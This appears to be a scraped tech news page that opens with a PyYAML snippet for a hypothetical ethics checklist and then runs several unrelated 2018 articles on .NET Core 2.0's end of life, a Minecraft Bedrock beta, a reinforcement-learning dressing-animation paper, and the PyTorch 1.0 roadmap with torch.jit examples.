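Returning to the custom checklist schema described above, here is a hypothetical example written out from Python with PyYAML. The titles, IDs, and line contents are invented for the example; only the field names follow the documented schema.

```python
import yaml  # pip install pyyaml

# Hypothetical custom checklist: a top-level title (string) and sections
# (list); each section has a title, a section_id, and lines; each line has
# a line_id, a line_summary, and the line content itself.
checklist = {
    "title": "Internal Ethics Checklist",
    "sections": [
        {
            "title": "Data Collection",
            "section_id": "A",
            "lines": [
                {
                    "line_id": "A.1",
                    "line_summary": "Informed consent",
                    "line": "Did all subjects consent to collection and use?",
                },
            ],
        },
    ],
}

with open("checklist.yml", "w") as f:
    yaml.safe_dump(checklist, f, sort_keys=False)
```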


.NET Core 2.0 reaches end of life, no longer supported by Microsoft

Prasad Ramesh
04 Oct 2018
2 min read
.NET Core 2.0 was released in mid-August 2017. It has now reached end of life (EOL) and will no longer be supported by Microsoft.

.NET Core 2.0 EOL

.NET Core 2.1 was released towards the end of May 2018, and .NET Core 2.0 reached EOL on October 1. This was supposed to happen on September 1 but was pushed back by a month since users experienced issues upgrading to the newer version. .NET Core 2.1 is a long-term support (LTS) release and should be supported until at least August 2021. It is recommended to upgrade to and use .NET Core 2.1 for your projects. There are no major changes in the newer version.

.NET Core 2.0 is no longer supported and updates won’t be provided. The installers, zips, and Docker images of .NET Core 2.0 will remain available, but they won’t be supported. Downloads for 2.0 will still be accessible via the Download Archives. However, .NET Core 2.0 has been removed from the microsoft/dotnet repository README file. All the existing images will still be available in that repository.

Microsoft’s support policy

The ‘LTS’ releases contain stabilized features and components and require fewer updates over their longer support lifetime. LTS releases are a good choice for applications that developers do not intend to update very often. The ‘current’ releases include features that are new and may undergo changes in the future based on feedback and issues. They give access to the latest features and improvements and hence are a good choice for applications in active development; however, upgrades to newer .NET Core releases are required more frequently to stay in support.

Some of the new features in .NET Core 2.1 include performance improvements, long-term support, Brotli compression, and new cryptography APIs. To migrate from .NET Core 2.0 to .NET Core 2.1, visit the Microsoft website. You can read the official announcement on GitHub.

Note: article amended 08.10.2018 - .NET Core 2.0 reached EOL on October 1, not .NET Core 2.1. The installers, zips and Docker images will still remain available but won't be supported, not unsupported.

.NET announcements: Preview 2 of .NET Core 2.2 and Entity Framework Core 2.2, C# 7.3, and ML.NET 0.5
Microsoft’s .NET Core 2.1 now powers Bing.com
Use App Metrics to analyze HTTP traffic, errors & network performance of a .NET Core app [Tutorial]


Minecraft Bedrock beta 1.9.0.3 is out with experimental scripting API!

Natasha Mathur
10 Dec 2018
2 min read
The Minecraft team released Minecraft Bedrock beta 1.9.0.3 last week. The latest release introduces new features such as a scripting API, along with minor changes and fixes. Let’s have a look at what’s new in Minecraft Bedrock 1.9.0.3 (beta).

Experimental Scripting API

Minecraft Bedrock beta 1.9.0.3 comes with a new scripting API that allows users to tweak the inner components of a game by writing commands. The Minecraft Script Engine uses the JavaScript language; scripts can be written and bundled with Behaviour Packs to invoke different actions. These actions include listening and responding to game events, and retrieving and modifying data in the components that entities have, which can affect different parts of the game. This feature is currently only available on Windows 10, after enabling the “Use Experimental Gameplay” setting.

Changes and Fixes

A minor change has been made to the size of the crossbow; it now appears bigger in the hands of pillagers (hostile illager mobs with crossbows in Minecraft).
A crash occurring during gameplay has been fixed.
The issue of tamed llamas turning into bioluminescent creatures on opening an inventory has been resolved.
The issue of items in hand appearing completely white has been fixed.
Rare instances of players getting teleported into a boat while travelling near water have been fixed.
The issue of the logo not being visible on the loading screen after suspending and resuming the game has been fixed.
With the new release, players no longer have the option to respawn in a semi-dead state if they are killed while in a bed.
The texture of the beacon beams has been improved.
The inventory blocks once again follow the textures that are set in blocks.json.
Optimizations have been made for proper synchronization between client and server.

Minecraft Bedrock beta 1.9.0.3 is available only on Xbox One, Windows 10, and Android (Google Play). For more information, check out the official release notes.

Minecraft Java team are open sourcing some of Minecraft’s code as libraries
Minecraft is serious about global warming, adds a new (spigot) plugin to allow changes in climate mechanics
A Brief History of Minecraft Modding

This AI generated animation can dress like humans using deep reinforcement learning

Prasad Ramesh
02 Nov 2018
4 min read
In a paper published this month, the human motion of putting on clothing is synthesized in animation with reinforcement learning. The paper, named Learning to Dress: Synthesizing Human Dressing Motion via Deep Reinforcement Learning, comes from a team of two Ph.D. students from the Georgia Institute of Technology, two of its professors, and a researcher from Google Brain.

Understanding the dressing problem

Dressing, such as putting on a t-shirt or a jacket, is something we do every day, yet it is a computationally costly and complex task for a machine to perform or for computers to simulate. This paper uses techniques from physics simulation and machine learning to simulate the animation.

Physics engine and reinforcement learning on a neural network

A physics engine is used to simulate character motion and cloth motion, while deep reinforcement learning on a neural network is used to produce character motion. The authors of the paper introduce a salient representation of haptic information to guide the dressing process. This haptic information is then used in the reward function to provide learning signals when training the network. As the task is too complex to perform in one go, the dressing task is separated into several subtasks for better control, and a policy sequencing algorithm is introduced to match the distribution of output states from one task to the input distribution of the next. The same approach is used to produce character controllers for various dressing tasks, like wearing a t-shirt, wearing a jacket, and robot-assisted dressing of a sleeve.

Dressing is complex, so it is split into several subtasks

The approach taken by the authors splits the dressing task into a sequence of subtasks, and a state machine guides the transitions between these tasks. Dressing a jacket, for example, consists of four subtasks:

Pulling the sleeve over the first arm.
Moving the second arm behind the back to get in position for the second sleeve.
Putting the hand in the second sleeve.
Finally, returning the body to a rest position.

A separate reinforcement learning problem is formulated for each subtask in order to learn a control policy. The policy sequencing algorithm ensures that these individual control policies lead to a successful dressing sequence when executed sequentially: the algorithm matches the initial state of one subtask with the final state of the previous subtask in the sequence. A variety of successful dressing motions can be produced by applying the resulting control policies. Each subtask in the dressing task is formulated as a partially observable Markov decision process (POMDP). Character dynamics are simulated with the Dynamic Animation and Robotics Toolkit (DART) and cloth dynamics with NVIDIA PhysX.

Conclusion and room for improvement

A system that learns to animate a character putting on clothing is successfully created with the use of deep reinforcement learning and physics simulation. The system learns each subtask individually, then connects them with a state machine. The authors found that carefully selecting the cloth observations and the reward functions were important factors in the success of their approach. The system currently performs only upper-body dressing; for the lower body, balance would have to be built into the controller. The number of subtasks might be reduced by using a control policy architecture with memory, which would allow for greater generalization of the skills learned.
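As a toy illustration of the policy sequencing idea, the sketch below chains per-subtask policies with a state machine: each policy runs until its termination test holds and hands its final state to the next policy as the initial state. The policies and the one-dimensional "state" are invented stand-ins for the paper's learned neural network controllers and physics simulation.

```python
def step(state, action):
    """Stand-in for one tick of the physics simulation."""
    return state + action

# (policy, done-predicate) pairs, one per subtask; in the paper these
# policies are neural networks trained with deep reinforcement learning.
subtasks = [
    (lambda s: 1 if s < 10 else 0, lambda s: s >= 10),  # pull first sleeve
    (lambda s: 2 if s < 20 else 0, lambda s: s >= 20),  # position second arm
    (lambda s: 1 if s < 25 else 0, lambda s: s >= 25),  # second sleeve
]

# The state machine: the final state of one subtask becomes the initial
# state of the next -- the property policy sequencing enforces in training.
state = 0
for policy, done in subtasks:
    while not done(state):
        state = step(state, policy(state))
print("dressing sequence complete, final state:", state)
```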
You can read the research paper at the Georgia Institute of Technology website.

Facebook launches Horizon, its first open source reinforcement learning platform for large-scale products and services
Deep reinforcement learning – trick or treat?
Google open sources Active Question Answering (ActiveQA), a Reinforcement Learning based Q&A system


Can a production-ready PyTorch 1.0 give TensorFlow a tough time?

Sunith Shetty
03 May 2018
5 min read
PyTorch has announced a preview of the blueprint for PyTorch 1.0, the next major release of the framework. This version is expected to bring more stability, integration support, and complete production backing, allowing developers to move from core research to production smoothly, without having to deal with migration challenges.

PyTorch is an open-source Python-based scientific computing package which provides powerful GPU acceleration. PyTorch is known for advanced indexing and functions, imperative style, integration support, and API simplicity. These are some of the key reasons why developers prefer PyTorch for research and hackability. To know more about how Facebook-backed PyTorch competes with Google’s TensorFlow, read our take on this deep learning war.

Some of the noteworthy changes in the roadmap for PyTorch 1.0 are:

Production support

One of the biggest challenges developers face with PyTorch is production support. A number of issues come up when trying to run models efficiently in production environments. Even though PyTorch provides excellent simplicity and flexibility, its tight coupling to Python makes performance at production scale a challenge.

To counter these challenges, the PyTorch team has decided to bring PyTorch and Caffe2 together to provide production-scale readiness to developers. However, adding production support brings complexity and configurable options for models into the API. The PyTorch team will stick to the goal of keeping the platform a favorable choice for researchers and developers. Hence, they are introducing a new just-in-time (JIT) compiler, named torch.jit. The torch.jit compiler rewrites PyTorch models at runtime in order to achieve scalability and efficiency in production environments. It can also export PyTorch models to run in a C++ environment (a runtime based on Caffe2 bits).

Note: In PyTorch version 1.0, your existing code will continue to work as-is.

Let’s go through how the JIT compiler can be used to export models to a Python-less environment in order to improve their performance.

torch.jit: The go-to compiler for your PyTorch models

Building models using Python code no doubt gives maximum productivity and makes PyTorch very simple and easy to use. However, this also means PyTorch finds it difficult to know which operation you will run next. This can be frustrating for developers during model export and automatic performance optimization, because the framework needs to know what the computations will look like before they are even executed. To deal with these issues, PyTorch provides two ways of recovering information from the Python code. Both methods are useful in different contexts, and you can mix them with ease:

Tracing the native Python code
Compiling a subset of the Python language

Tracing mode

The torch.jit.trace function allows you to record the native PyTorch operations performed, along with the data dependencies between them. PyTorch version 0.3 already had a tracer function, which is used to export models through ONNX. The new version uses a high-performance C++ runtime that allows PyTorch to re-execute programs for you. The key advantage of this method is that it doesn’t have to deal with how your Python code is structured, since only native PyTorch operations are traced.

Script mode

The PyTorch team has come up with a solution called script mode, made specially for models such as RNNs which make use of control flow. For these, you write out a regular Python function (avoiding complex language features), and to get the function compiled, you apply the @script decorator. This compiles your Python function directly into high-performance C++ at runtime.

Advantages in optimization and export techniques

Whether you use a trace or a script function, the technique allows you to optimize and export the model for use in production environments (i.e., a Python-free representation of the model). You can now derive bigger segments of the model into an intermediate representation to work with sophisticated models, and you can use the high-performance backends available in Caffe2 to run the models efficiently.

Usability

If you don’t need to export or optimize your model, you do not need to use this set of new features. These modes will be included in the core of the PyTorch ecosystem, allowing you to mix and match them with your existing code seamlessly, as per your needs.

Additional changes and improvements

In addition to the major update in production support for 1.0, the PyTorch team will continue optimizing, working on the stability of the interface, and fixing other modules in the PyTorch ecosystem. PyTorch 1.0 will see some changes on the backend side which might affect user-written C and C++ extensions. In order to incorporate new features and optimization techniques from Caffe2, the PyTorch team is replacing (optimizing) the backend ATen library.

The PyTorch team is planning to release 1.0 during the summer. For a detailed preview of the roadmap, you can refer to the official PyTorch blog.

Top 10 deep learning frameworks
The Deep Learning Framework Showdown: TensorFlow vs CNTK
Why you should use Keras for deep learning
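For a concrete feel of the two capture modes described above, here is a minimal sketch against the torch.jit API as it eventually shipped. The module and function are invented toy examples, and the preview's @script decorator corresponds to torch.jit.script in released versions.

```python
import torch

class Net(torch.nn.Module):
    def __init__(self):
        super().__init__()
        self.fc = torch.nn.Linear(4, 2)

    def forward(self, x):
        return torch.relu(self.fc(x))

# Tracing mode: run the model once on example input and record the
# native PyTorch operations that were executed.
traced = torch.jit.trace(Net(), torch.randn(1, 4))
traced.save("net.pt")  # loadable from the C++ runtime, no Python needed

# Script mode: compile the function itself, so data-dependent control
# flow (loops, ifs) is preserved in the exported program.
@torch.jit.script
def positive_sum(x):
    total = torch.zeros(1)
    for i in range(x.size(0)):
        if bool(x[i] > 0):
            total = total + x[i]
    return total

print(positive_sum(torch.randn(8)))
```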